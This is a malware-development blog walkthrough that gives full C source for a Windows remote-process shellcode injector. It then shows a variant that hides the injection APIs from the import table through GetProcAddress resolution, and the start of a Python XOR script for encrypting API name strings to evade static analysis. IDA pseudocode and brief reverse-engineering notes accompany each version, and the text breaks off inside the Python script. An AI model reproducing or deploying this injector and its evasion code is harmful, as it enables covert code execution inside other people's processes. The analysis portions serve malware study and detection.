This writeup is part of a series where I plan to share what I’ve learned about malware development and red team tooling development. Each writeup will offer a guide and in-depth technical insights into the malware or program I’m working on. Along with that, I’ll include a simple reverse engineering analysis to show what it looks like in a disassembler. The goal is to sharpen my skills in both malware development and malware analysis/reverse engineering through this process.
This post first walks through writing a simple malware program that injects shellcode into a remote target process identified by a supplied PID. It then covers how to hide suspicious Windows API calls from the Import Address Table (IAT) to avoid basic analysis. Last, it covers how to XOR encrypt certain strings and how that obfuscates what the program does under basic static analysis.
All project files (code and scripts) can be found here: https://github.com/0xEct0/Maldev-Re-1
NOTE: The following snippets of code throughout this writeup have a lot of Windows APIs. I will not go in depth on what each argument/return value is, so please refer to the API’s respective Microsoft documentation page for more detailed technical information.
Writing a Simple Shellcode Injection Program - no-obfuscation.c
The execution flow of no-obfuscation.c at a high level:
- Accept the PID of the target process as a command-line argument
- Validate there’s a running process that matches the PID supplied
- Open handle to target process
- Allocate memory in target process
- Write shellcode in the allocated memory within the target process
- Change permissions to have the region of memory executable
- Execute the shellcode in the region of allocated memory
The first step is pretty straightforward: we take the first command-line argument, argv[1] (argv[0] is the program name), and convert it to an integer:
int main( int argc, char *argv[] )
{
    // argv[0] is the program name, so the PID must be supplied as argv[1]
    if( argc < 2 )
    {
        return 0;
    }
    DWORD process_id = atoi( argv[1] );
}
Now to validate that there’s a running process with that PID, we’ll use the following Windows APIs:
- CreateToolhelp32Snapshot - Gets a snapshot of all running processes
- Process32First - Gets information about the first process in the snapshot from CreateToolhelp32Snapshot
- Process32Next - Gets information about the next process in the snapshot from CreateToolhelp32Snapshot
- OpenProcess - Once the PID is verified, this API gets a handle to the process
Each process in the snapshot is described by a PROCESSENTRY32 struct. From the Microsoft docs:
typedef struct tagPROCESSENTRY32 {
DWORD dwSize;
DWORD cntUsage;
DWORD th32ProcessID;
ULONG_PTR th32DefaultHeapID;
DWORD th32ModuleID;
DWORD cntThreads;
DWORD th32ParentProcessID;
LONG pcPriClassBase;
DWORD dwFlags;
CHAR szExeFile[MAX_PATH];
} PROCESSENTRY32;
The field we’re interested in is th32ProcessID, which holds the PID of the process.
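As a quick sanity check on the layout, the following minimal sketch mirrors PROCESSENTRY32 with Python’s ctypes. It assumes a 64-bit build (where ULONG_PTR is 8 bytes), the ANSI variant of the struct, and a 64-bit host to run it on. The fixed-width ctypes types are my own stand-ins for the Windows typedefs and are not taken from the project files. Under those assumptions the struct comes out at 304 bytes, which is the same value that appears later as pe.dwSize = 304 in the decompiled output.

```python
import ctypes

MAX_PATH = 260  # Windows constant for the maximum path length

class PROCESSENTRY32(ctypes.Structure):
    # Field order follows the Microsoft definition quoted above.
    # Fixed-width types are used so the layout models a 64-bit Windows build
    # regardless of the OS this sketch runs on (assumption: x64, ANSI struct).
    _fields_ = [
        ("dwSize", ctypes.c_uint32),
        ("cntUsage", ctypes.c_uint32),
        ("th32ProcessID", ctypes.c_uint32),
        ("th32DefaultHeapID", ctypes.c_uint64),   # ULONG_PTR on x64
        ("th32ModuleID", ctypes.c_uint32),
        ("cntThreads", ctypes.c_uint32),
        ("th32ParentProcessID", ctypes.c_uint32),
        ("pcPriClassBase", ctypes.c_int32),       # LONG
        ("dwFlags", ctypes.c_uint32),
        ("szExeFile", ctypes.c_char * MAX_PATH),  # CHAR[MAX_PATH]
    ]

entry_size = ctypes.sizeof(PROCESSENTRY32)
pid_offset = PROCESSENTRY32.th32ProcessID.offset
print(f"sizeof(PROCESSENTRY32) = {entry_size}, th32ProcessID at offset {pid_offset}")
```

This also explains why the code sets dwSize before calling Process32First: the API uses that field to know which version of the struct the caller allocated.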
To enumerate the running processes, we first call CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 ). TH32CS_SNAPPROCESS means the snapshot will include all running processes on the system. The second argument doesn’t matter here; as the Microsoft docs for this API say, “The process identifier of the process to be included in the snapshot. This parameter can be zero to indicate the current process. This parameter is used when the TH32CS_SNAPHEAPLIST, TH32CS_SNAPMODULE, TH32CS_SNAPMODULE32, or TH32CS_SNAPALL value is specified. Otherwise, it is ignored and all processes are included in the snapshot.”
Once a snapshot has been successfully created, we look at the first process using Process32First and enter a do-while loop to check the process ID. If it does not match the PID supplied to the program, the loop moves on to the next process in the snapshot using Process32Next. If the process ID matches, the program obtains a handle to the target using the OpenProcess API and breaks out of the loop. Below is the code for that:
HANDLE process_snapshot;
HANDLE target_process = NULL;
PROCESSENTRY32 current_process;
//
// ENUMERATE RUNNING PROCESSES TO ENSURE PID IS VALID
//
process_snapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
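// NOTE: per the Microsoft docs, CreateToolhelp32Snapshot returns INVALID_HANDLE_VALUE
// (not NULL) on failure, so a stricter check would also compare against that value.
if( NULL == process_snapshot )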
{
return 1;
}
current_process.dwSize = sizeof( PROCESSENTRY32 );
Process32First( process_snapshot, &current_process );
do
{
// printf( "process id = %d\n", current_process.th32ProcessID );
if( process_id == current_process.th32ProcessID )
{
target_process = OpenProcess( PROCESS_ALL_ACCESS, TRUE, current_process.th32ProcessID );
break;
}
}
while( Process32Next(process_snapshot, &current_process) );
CloseHandle( process_snapshot );
if( NULL == target_process )
{
// printf( "[!] Could not find target or OpenProcess() failed!\n" );
return 1;
}
Once the PID has been matched to a running process and a handle to that process has been obtained, the next step is to allocate memory in the target process using the VirtualAllocEx API. We allocate as many bytes as the payload needs and give the region read and write permissions; a later step changes the protection so the region can be executed. The API returns a pointer to the allocated memory in the target process. Read the Microsoft docs for specific information about this function. Below is the code for allocating memory in the target process.
size_t payload_size = sizeof( payload );
LPVOID target_process_allocated_memory = NULL;
target_process_allocated_memory = VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
if( NULL == target_process_allocated_memory )
{
// printf( "[!] Could not allocate memory!\n" );
return 1;
}
The next step is to write our payload into the target process, at the address of the memory we allocated in the previous step:
//
// WRITE TO ALLOCATED MEMORY
//
BOOL return_check = FALSE;
return_check = WriteProcessMemory( target_process, target_process_allocated_memory, payload, payload_size, NULL );
if( FALSE == return_check )
{
// printf( "[+] WriteProcessMemory returned false!\n" );
return 1;
}
Next, we update the protection of the allocated region where we injected the payload to allow execution, using the VirtualProtectEx Windows API. We set the memory protection to PAGE_EXECUTE_READWRITE. Note that this API requires a valid pointer for its last parameter (old_protect in the code below); from the API docs: “[out] lpflOldProtect - A pointer to a variable that receives the previous access protection of the first page in the specified region of pages. If this parameter is NULL or does not point to a valid variable, the function fails.” Below is the code for it.
//
// UPDATE PERMISSIONS TO ALLOW EXECUTION
//
DWORD old_protect = 0;
return_check = VirtualProtectEx( target_process, target_process_allocated_memory, payload_size, PAGE_EXECUTE_READWRITE, &old_protect );
if( FALSE == return_check )
{
// printf( "[!] VirtualProtectEx() returned false! Error code: %d\n", GetLastError() );
return 1;
}
Last, we’ll execute the injected shellcode using the CreateRemoteThread WinAPI:
//
// EXECUTE SHELLCODE IN ALLOCATED MEMORY
//
HANDLE handle_remote_thread = NULL;
handle_remote_thread = CreateRemoteThread( target_process, NULL, 0, target_process_allocated_memory, NULL, 0, NULL );
if( NULL == handle_remote_thread )
{
// printf( "[!] CreateRemoteThread() failed!\n" );
return 1;
}
// printf( "[+] Executed payload!\n" );
return 0;
Compilation was done using the Microsoft Visual Studio cl.exe compiler: cl.exe no-obfuscation.c /Fe:no-obfuscation.exe
Static Analysis of no-obfuscation.exe
For the reverse engineering analysis, I will be using IDA freeware. To start off, we can look at the Import Address Table (IAT). This Microsoft dev blog post (https://devblogs.microsoft.com/oldnewthing/20221006-07/?p=107257) describes the IAT as follows:
The import address table is the part of the Windows module (executable or dynamic link library) which records the addresses of functions imported from other DLLs. For example, if your program calls GetSystemInfo(), then the executable or DLL will have an entry in its import table that says, “I would like to be able to call the function GetSystemInfo() from kernel32.dll.” When the module is loaded, the system goes and finds that function, obtains its address, and stores it in a table known as the Import Address Table (IAT).
Essentially, we can look at the IAT to see which APIs are imported and used within the executable. This can give us an idea of what the executable will do. In IDA freeware, the IAT can be viewed under View > Open subviews > Imports.
Right away, we can see some suspicious Windows APIs that should be familiar to us. Grouping by functionality, the CreateToolhelp32Snapshot, Process32First, and Process32Next APIs are used to enumerate the running processes on the system, while OpenProcess, VirtualAllocEx, VirtualProtectEx, WriteProcessMemory, and CreateRemoteThread are used for process injection/memory injection techniques.
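The grouping described above can be expressed as a small analyst-side triage helper. This is only a sketch: the category names, the SUSPICIOUS_IMPORTS table, and the triage_imports function are hypothetical names I introduce for illustration, and the sample input is a hand-typed list rather than real output from IDA.

```python
# Hypothetical grouping of API names by the behaviour they usually hint at.
SUSPICIOUS_IMPORTS = {
    "process enumeration": {
        "CreateToolhelp32Snapshot", "Process32First", "Process32Next",
    },
    "process injection": {
        "OpenProcess", "VirtualAllocEx", "VirtualProtectEx",
        "WriteProcessMemory", "CreateRemoteThread",
    },
}

def triage_imports(import_names):
    """Return {category: sorted matching imports} for a list of imported API names."""
    present = set(import_names)
    report = {}
    for category, apis in SUSPICIOUS_IMPORTS.items():
        hits = sorted(present & apis)
        if hits:
            report[category] = hits
    return report

# Illustrative input only: a hand-typed subset of an import listing.
sample_imports = ["CloseHandle", "CreateRemoteThread", "OpenProcess",
                  "Process32First", "GetLastError"]

for category, hits in triage_imports(sample_imports).items():
    print(f"{category}: {', '.join(hits)}")
```

None of these APIs is malicious on its own; it is the combination of enumeration plus remote allocation, write, and thread creation that makes the import table stand out.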
In addition, we can have IDA generate pseudocode to make analysis easier via View > Open subviews > Generate pseudocode. Here is the resulting pseudocode:
int __fastcall main(int argc, const char **argv, const char **envp)
{
HANDLE hProcess; // [rsp+48h] [rbp-180h]
void *lpBaseAddress; // [rsp+50h] [rbp-178h]
HANDLE hSnapshot; // [rsp+58h] [rbp-170h]
int v7; // [rsp+60h] [rbp-168h]
DWORD flOldProtect; // [rsp+64h] [rbp-164h] BYREF
SIZE_T dwSize; // [rsp+68h] [rbp-160h]
__int64 v10; // [rsp+70h] [rbp-158h]
PROCESSENTRY32 pe; // [rsp+80h] [rbp-148h] BYREF
if ( argc < 2 )
return 0;
hProcess = 0LL;
v7 = unknown_libname_19(argv[1], argv, envp);
hSnapshot = CreateToolhelp32Snapshot(2u, 0);
if ( !hSnapshot )
return 1;
pe.dwSize = 304;
Process32First(hSnapshot, &pe);
while ( v7 != pe.th32ProcessID )
{
if ( !Process32Next(hSnapshot, &pe) )
goto LABEL_8;
}
hProcess = OpenProcess(0x1FFFFFu, 1, pe.th32ProcessID);
LABEL_8:
CloseHandle(hSnapshot);
if ( !hProcess )
return 1;
dwSize = 3072LL;
lpBaseAddress = VirtualAllocEx(hProcess, 0LL, 0xC00uLL, 0x3000u, 4u);
if ( !lpBaseAddress )
return 1;
if ( !WriteProcessMemory(hProcess, lpBaseAddress, &unk_14001C000, dwSize, 0LL) )
return 1;
flOldProtect = 0;
if ( !VirtualProtectEx(hProcess, lpBaseAddress, dwSize, 0x40u, &flOldProtect) )
return 1;
v10 = 0LL;
return CreateRemoteThread(hProcess, 0LL, 0LL, (LPTHREAD_START_ROUTINE)lpBaseAddress, 0LL, 0, 0LL) == 0LL;
}
Here we can see that IDA’s output is pretty close to the source code: the program first checks that the user supplied an argument (a PID), then enumerates the processes using the aforementioned Windows APIs, gets a handle to the target process using OpenProcess, and finally uses several Windows APIs to inject the shellcode into the target process.
As shown, identifying which Windows APIs this program uses was very straightforward. Either the IAT or the pseudocode generated by IDA is enough to see which APIs are called, and thus what the program is meant to do.
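One detail worth decoding in the pseudocode is that the symbolic constants from the source appear as raw numbers (2u, 0x1FFFFFu, 0x3000u, 4u, 0x40u). The sketch below maps them back to their names. The numeric values are the ones defined in the Windows SDK headers (PROCESS_ALL_ACCESS is 0x1FFFFF on Windows Vista and later); the decode_flags helper and the table names are hypothetical, and the tables only contain the handful of constants this program uses.

```python
# Constant values as defined in the Windows SDK headers (subset used here).
SNAPSHOT_FLAGS = {0x02: "TH32CS_SNAPPROCESS"}
PROCESS_ACCESS = {0x1FFFFF: "PROCESS_ALL_ACCESS"}
ALLOCATION_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECTION = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}

def decode_flags(value, names):
    """Render a numeric argument as the OR of the known constants it contains."""
    if value in names:                      # exact match, e.g. PROCESS_ALL_ACCESS
        return names[value]
    parts, remaining = [], value
    for bit, name in sorted(names.items()):
        if value & bit == bit:
            parts.append(name)
            remaining &= ~bit
    if remaining:                           # keep any bits we have no name for
        parts.append(hex(remaining))
    return " | ".join(parts) if parts else hex(value)

print("CreateToolhelp32Snapshot:", decode_flags(0x2, SNAPSHOT_FLAGS))
print("OpenProcess:", decode_flags(0x1FFFFF, PROCESS_ACCESS))
print("VirtualAllocEx:", decode_flags(0x3000, ALLOCATION_TYPE), "/",
      decode_flags(0x4, PAGE_PROTECTION))
print("VirtualProtectEx:", decode_flags(0x40, PAGE_PROTECTION))
```

In IDA itself the same result can be had by applying the standard symbolic constants (enums) to the operands, so this script is only meant to make the mapping explicit.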
Obfuscating Windows APIs - obfuscated-apis.c
To provide a simple layer of obfuscation, we can use two APIs to dynamically load and call other Windows APIs: LoadLibraryA and GetProcAddress. The former obtains a handle to a DLL, while the latter gets the address of a function within a DLL. Using these two functions, we can declare a function pointer that matches the signature of the WinAPI function we want to use, and then assign it the address of that WinAPI function for later use. Consider the example below using MessageBoxA:
char string1[] = "Hello, World!";
char string2[] = "Test MessageBox()";
MessageBoxA(NULL, string1, string2, MB_OK );
return 0;
Looking at the IAT of the resulting executable, you can see that the MessageBoxA API is imported. However, the code snippet below shows how we can dynamically load and call the same API:
char string1[] = "Hello, World!";
char string2[] = "Test MessageBox()";
HMODULE user32_handle = LoadLibraryA( "USER32.DLL" );
if( NULL == user32_handle )
{
DWORD dwError = GetLastError();
return 1;
}
// Function pointer matching the ANSI MessageBoxA signature (LPCSTR parameters)
int (WINAPI * _MessageBox)
(
    HWND hWnd,
    LPCSTR lpText,
    LPCSTR lpCaption,
    UINT uType
);
_MessageBox = ( int (WINAPI *)
(
    HWND hWnd,
    LPCSTR lpText,
    LPCSTR lpCaption,
    UINT uType
)) GetProcAddress( user32_handle, "MessageBoxA");
if( NULL == _MessageBox)
{
printf( "Could not initialize _MessageBox!\n" );
return 1;
}
_MessageBox(NULL, string1, string2, MB_OK );
return 0;
We first load the DLL using LoadLibraryA, and in this instance we load user32.dll since that’s where the API we want to use resides. We then check that it was loaded properly, define a function pointer with the same signature as MessageBoxA, and name it _MessageBox. Then we set the pointer to the address of the MessageBoxA function using GetProcAddress. Last, we check that the function was resolved correctly so that it is ready to be used. Looking at the IAT of the resulting exe in IDA, MessageBoxA is no longer listed. We can apply this same methodology to the original process injection code.
For the process injection code, we’ll hide the main API functions that pretty much give away what the code does:
CreateToolhelp32Snapshot
Process32First
Process32Next
VirtualAllocEx
VirtualProtectEx
OpenProcess
WriteProcessMemory
CreateRemoteThread
All of these functions are exported by kernel32.dll, so we only need to obtain a handle to that one module:
HMODULE kernel32_dll_handle = LoadLibraryA( "KERNEL32.DLL" );
if( NULL == kernel32_dll_handle )
{
return 1;
}
Now, with a handle to the kernel32 module, we can use GetProcAddress to resolve our own function pointers whose signatures match the WinAPI functions we want to call. The following example resolves CreateToolhelp32Snapshot:
HANDLE( WINAPI * _CreateToolhelp32Snapshot )
(
DWORD dwFlags,
DWORD th32ProcessID
);
_CreateToolhelp32Snapshot = (HANDLE (WINAPI *)
(
DWORD dwFlags,
DWORD th32ProcessID
)) GetProcAddress( kernel32_dll_handle, "CreateToolhelp32Snapshot" );
Then, to use _CreateToolhelp32Snapshot, we call it exactly like the original API:
// check to ensure it's been resolved
if( NULL == _CreateToolhelp32Snapshot )
{
return 1;
}
process_snapshot = _CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
Another example with VirtualAllocEx:
LPVOID( WINAPI * _VirtualAllocEx )
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
_VirtualAllocEx = ( LPVOID( WINAPI *)
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
)) GetProcAddress( kernel32_dll_handle, "VirtualAllocEx" );
if( NULL == _VirtualAllocEx )
{
// printf( "Could not resolve VirtualAllocEx!\n" );
return 1;
}
target_process_allocated_memory = _VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
We can repeat this process of resolving APIs to hide them from the IAT. Here is the final code for this version:
#include <stdio.h>
#include <windows.h>
#include <TlHelp32.h>
#include "payload.h"
int main( int argc, char* argv[] )
{
if( argc < 2 )
{
return 1;
}
HANDLE process_snapshot;
HANDLE target_process = NULL;
PROCESSENTRY32 current_process;
DWORD process_id = atoi( argv[1] );
//
// ENUMERATE RUNNING PROCESSES TO ENSURE PID IS VALID
//
HMODULE kernel32_dll_handle = LoadLibraryA( "KERNEL32.DLL" );
if( NULL == kernel32_dll_handle )
{
// printf( "Could not load kernel32.dll!\n" );
return 1;
}
HANDLE( WINAPI * _CreateToolhelp32Snapshot )
(
DWORD dwFlags,
DWORD th32ProcessID
);
_CreateToolhelp32Snapshot = (HANDLE (WINAPI *)
(
DWORD dwFlags,
DWORD th32ProcessID
)) GetProcAddress( kernel32_dll_handle, "CreateToolhelp32Snapshot" );
if( NULL == _CreateToolhelp32Snapshot )
{
// printf( "Could not resolve CreateToolhelp32Snapshot!\n" );
return 1;
}
process_snapshot = _CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
if( NULL == process_snapshot )
{
return 1;
}
current_process.dwSize = sizeof( PROCESSENTRY32 );
BOOL( WINAPI * _Process32First)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
);
_Process32First = ( BOOL (WINAPI *)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
)) GetProcAddress( kernel32_dll_handle, "Process32First" );
if( NULL == _Process32First )
{
// printf( "Could not resolve Process32First!\n" );
return 1;
}
_Process32First( process_snapshot, &current_process );
BOOL( WINAPI * _Process32Next)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
);
_Process32Next = ( BOOL (WINAPI *)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
)) GetProcAddress( kernel32_dll_handle, "Process32Next" );
if( NULL == _Process32Next )
{
// printf( "Could not resolve Process32Next!\n" );
return 1;
}
do
{
// printf( "process id = %d\n", current_process.th32ProcessID );
if( process_id == current_process.th32ProcessID )
{
HANDLE( WINAPI * _OpenProcess )
(
DWORD dwDesiredAccess,
BOOL bInheritHandle,
DWORD dwProcessId
);
_OpenProcess = ( HANDLE (WINAPI *)
(
DWORD dwDesiredAccess,
BOOL bInheritHandle,
DWORD dwProcessId
)) GetProcAddress( kernel32_dll_handle, "OpenProcess" );
if( NULL == _OpenProcess )
{
// printf( "Could not resolve OpenProcess!\n" );
return 1;
}
target_process = _OpenProcess( PROCESS_ALL_ACCESS, TRUE, current_process.th32ProcessID );
break;
}
}
while( _Process32Next(process_snapshot, &current_process) );
CloseHandle( process_snapshot );
if( NULL == target_process )
{
return 1;
}
//
// ALLOCATE MEMORY IN TARGET PROCESS
//
size_t payload_size = sizeof( payload );
LPVOID target_process_allocated_memory = NULL;
LPVOID( WINAPI * _VirtualAllocEx )
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
_VirtualAllocEx = ( LPVOID( WINAPI *)
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
)) GetProcAddress( kernel32_dll_handle, "VirtualAllocEx" );
if( NULL == _VirtualAllocEx )
{
// printf( "Could not resolve VirtualAllocEx!\n" );
return 1;
}
target_process_allocated_memory = _VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
if( NULL == target_process_allocated_memory )
{
// printf( "[!] Could not allocate memory!\n" );
return 1;
}
// printf( "[+] Successfully allocated memory!\n" );
//
// WRITE TO ALLOCATED MEMORY
//
BOOL return_check = FALSE;
BOOL( WINAPI * _WriteProcessMemory )
(
HANDLE hProcess,
LPVOID lpBaseAddress,
LPCVOID lpBuffer,
SIZE_T nSize,
SIZE_T *lpNumberOfBytesWritten
);
_WriteProcessMemory = ( BOOL(WINAPI *)
(
HANDLE hProcess,
LPVOID lpBaseAddress,
LPCVOID lpBuffer,
SIZE_T nSize,
SIZE_T *lpNumberOfBytesWritten
)) GetProcAddress( kernel32_dll_handle, "WriteProcessMemory" );
if( NULL == _WriteProcessMemory )
{
// printf( "Could not resolve WriteProcessMemory!\n" );
return 1;
}
return_check = _WriteProcessMemory( target_process, target_process_allocated_memory, payload, payload_size, NULL );
if( FALSE == return_check )
{
// printf( "[+] WriteProcessMemory returned false!\n" );
return 1;
}
//
// UPDATE PERMISSIONS TO ALLOW EXECUTION
//
DWORD old_protect = 0;
BOOL( WINAPI * _VirtualProtectEx )
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flNewProtect,
PDWORD lpflOldProtect
);
_VirtualProtectEx = ( BOOL(WINAPI *)
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flNewProtect,
PDWORD lpflOldProtect
)) GetProcAddress( kernel32_dll_handle, "VirtualProtectEx" );
if( NULL == _VirtualProtectEx )
{
// printf( "Could not resolve VirtualProtectEx!\n" );
return 0;
}
return_check = _VirtualProtectEx( target_process, target_process_allocated_memory, payload_size, PAGE_EXECUTE_READWRITE, &old_protect );
if( FALSE == return_check )
{
// printf( "[!] VirtualProtectEx() returned false! Error code: %d\n", GetLastError() );
return 1;
}
//
// EXECUTED SHELLCODE IN ALLOCATED MEMORY
//
HANDLE handle_remote_thread = NULL;
HANDLE( WINAPI * _CreateRemoteThread )
(
HANDLE hProcess,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
DWORD dwCreationFlags,
LPDWORD lpThreadId
);
_CreateRemoteThread = ( HANDLE(WINAPI *)
(
HANDLE hProcess,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
DWORD dwCreationFlags,
LPDWORD lpThreadId
)) GetProcAddress( kernel32_dll_handle, "CreateRemoteThread" );
if( NULL == _CreateRemoteThread )
{
// printf( "Could not resolve CreateRemoteThread!\n" );
return 1;
}
handle_remote_thread = _CreateRemoteThread( target_process, NULL, 0, target_process_allocated_memory, NULL, 0, NULL );
if( NULL == handle_remote_thread )
{
// printf( "[!] CreateRemoteThread() failed!\n" );
return 1;
}
return 0;
}
Static Analysis of obfuscated-apis.exe
Opening this version of the process injection executable and looking at the IAT, the APIs that we dynamically resolved are no longer listed.
However, we can now see the two APIs that were used to hide them, GetProcAddress and LoadLibraryA. We could go further and hide these two as well by walking the PEB and calculating the absolute addresses of these functions, but that is out of scope for this article. This process is outlined in the shellcoding a reverse shell writeup in C post on my blog.
Furthermore, the pseudocode generated by IDA looks similar to before, except that we can now see each WinAPI function being resolved before it is called:
int __fastcall main(int argc, const char **argv, const char **envp)
{
HMODULE hModule; // [rsp+48h] [rbp-1C0h]
__int64 v5; // [rsp+50h] [rbp-1B8h]
__int64 v6; // [rsp+58h] [rbp-1B0h]
HANDLE hObject; // [rsp+60h] [rbp-1A8h]
int v8; // [rsp+68h] [rbp-1A0h]
int v9; // [rsp+6Ch] [rbp-19Ch] BYREF
__int64 v10; // [rsp+70h] [rbp-198h]
HANDLE (__stdcall *CreateToolhelp32Snapshot)(DWORD, DWORD); // [rsp+78h] [rbp-190h]
BOOL (__stdcall *Process32First)(HANDLE, LPPROCESSENTRY32); // [rsp+80h] [rbp-188h]
HANDLE (__stdcall *OpenProcess)(DWORD, BOOL, DWORD); // [rsp+88h] [rbp-180h]
BOOL (__stdcall *Process32Next)(HANDLE, LPPROCESSENTRY32); // [rsp+90h] [rbp-178h]
LPVOID (__stdcall *VirtualAllocEx)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD); // [rsp+98h] [rbp-170h]
BOOL (__stdcall *WriteProcessMemory)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T *); // [rsp+A0h] [rbp-168h]
BOOL (__stdcall *VirtualProtectEx)(HANDLE, LPVOID, SIZE_T, DWORD, PDWORD); // [rsp+A8h] [rbp-160h]
HANDLE (__stdcall *CreateRemoteThread)(HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); // [rsp+B0h] [rbp-158h]
__int64 v19; // [rsp+B8h] [rbp-150h]
int v20; // [rsp+C0h] [rbp-148h] BYREF
unsigned int v21; // [rsp+C8h] [rbp-140h]
if ( argc < 2 )
return 1;
v5 = 0LL;
v8 = unknown_libname_19(argv[1], argv, envp);
hModule = LoadLibraryA(LibFileName);
if ( !hModule )
return 1;
CreateToolhelp32Snapshot = (HANDLE (__stdcall *)(DWORD, DWORD))GetProcAddress(hModule, ProcName);
if ( !CreateToolhelp32Snapshot )
return 1;
hObject = (HANDLE)((__int64 (__fastcall *)(__int64, _QWORD))CreateToolhelp32Snapshot)(2LL, 0LL);
if ( !hObject )
return 1;
v20 = 304;
Process32First = (BOOL (__stdcall *)(HANDLE, LPPROCESSENTRY32))GetProcAddress(hModule, aProcess32first);
if ( !Process32First )
return 1;
((void (__fastcall *)(HANDLE, int *))Process32First)(hObject, &v20);
Process32Next = (BOOL (__stdcall *)(HANDLE, LPPROCESSENTRY32))GetProcAddress(hModule, aProcess32next);
if ( !Process32Next )
return 1;
while ( v8 != v21 )
{
if ( !((unsigned int (__fastcall *)(HANDLE, int *))Process32Next)(hObject, &v20) )
goto LABEL_18;
}
OpenProcess = (HANDLE (__stdcall *)(DWORD, BOOL, DWORD))GetProcAddress(hModule, aOpenprocess);
if ( !OpenProcess )
return 1;
v5 = ((__int64 (__fastcall *)(__int64, __int64, _QWORD))OpenProcess)(0x1FFFFFLL, 1LL, v21);
LABEL_18:
CloseHandle(hObject);
if ( !v5 )
return 1;
v10 = 3072LL;
VirtualAllocEx = (LPVOID (__stdcall *)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD))GetProcAddress(hModule, aVirtualallocex);
if ( !VirtualAllocEx )
return 1;
v6 = ((__int64 (__fastcall *)(__int64, _QWORD, __int64, __int64, int))VirtualAllocEx)(v5, 0LL, v10, 12288LL, 4);
if ( !v6 )
return 1;
WriteProcessMemory = (BOOL (__stdcall *)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T *))GetProcAddress(
hModule,
aWriteprocessme);
if ( !WriteProcessMemory )
return 1;
if ( !((unsigned int (__fastcall *)(__int64, __int64, void *, __int64, _QWORD))WriteProcessMemory)(
v5,
v6,
&unk_14001C000,
v10,
0LL) )
return 1;
v9 = 0;
VirtualProtectEx = (BOOL (__stdcall *)(HANDLE, LPVOID, SIZE_T, DWORD, PDWORD))GetProcAddress(hModule, aVirtualprotect);
if ( !VirtualProtectEx )
return 0;
if ( !((unsigned int (__fastcall *)(__int64, __int64, __int64, __int64, int *))VirtualProtectEx)(
v5,
v6,
v10,
64LL,
&v9) )
return 1;
v19 = 0LL;
CreateRemoteThread = (HANDLE (__stdcall *)(HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD))GetProcAddress(hModule, aCreateremoteth);
if ( !CreateRemoteThread )
return 1;
v19 = ((__int64 (__fastcall *)(__int64, _QWORD, _QWORD, __int64, _QWORD, _DWORD, _QWORD))CreateRemoteThread)(
v5,
0LL,
0LL,
v6,
0LL,
0,
0LL);
return v19 == 0;
}
In general, by looking through the pseudocode you can still infer what the executable is doing. The API names passed to GetProcAddress are still stored in the binary as plain strings, and IDA evidently uses them to name and type the resolved function pointers.
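To illustrate why the names are still easy to find, here is a minimal sketch of a strings-style scan that looks for the API names this walkthrough resolves at run time. The helper names (ascii_strings, find_api_names) are hypothetical, and sample_blob is a synthetic stand-in for a data section, not bytes taken from the real executable.

```python
import re

# API names the walkthrough resolves dynamically (from the list earlier in the post).
RESOLVED_API_NAMES = [
    "CreateToolhelp32Snapshot", "Process32First", "Process32Next", "OpenProcess",
    "VirtualAllocEx", "VirtualProtectEx", "WriteProcessMemory", "CreateRemoteThread",
]

def ascii_strings(data, min_len=4):
    """Return runs of printable ASCII at least min_len bytes long, like `strings`."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [match.group().decode("ascii") for match in pattern.finditer(data)]

def find_api_names(data, names=RESOLVED_API_NAMES):
    """Return the API names (in table order) that occur in any extracted string."""
    strings = ascii_strings(data)
    return [name for name in names if any(name in s for s in strings)]

# Synthetic example data: NUL-separated strings surrounded by non-printable bytes.
sample_blob = (b"\x00\x01KERNEL32.DLL\x00VirtualAllocEx\x00"
               b"\xff\xfeWriteProcessMemory\x00")

print(find_api_names(sample_blob))
```

To run it against a real file, the bytes could be read with open(path, "rb").read(); the path and the choice of file are left to the reader.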
Encrypting the WinAPI Strings - encrypted-apis.c
To further apply anti-analysis techniques to the process injection program, we’ll XOR encrypt suspicious strings, such as the names of any modules we load and the names of the APIs we resolve using GetProcAddress. To encrypt the strings, I used the following python3 program, which takes all strings in a file xor-list.txt, generates a random one-byte key, XOR encrypts every string in the text file, and outputs the resulting encrypted bytes as C arrays:
import random

def generate_xor_key():
    return random.getrandbits( 8 )

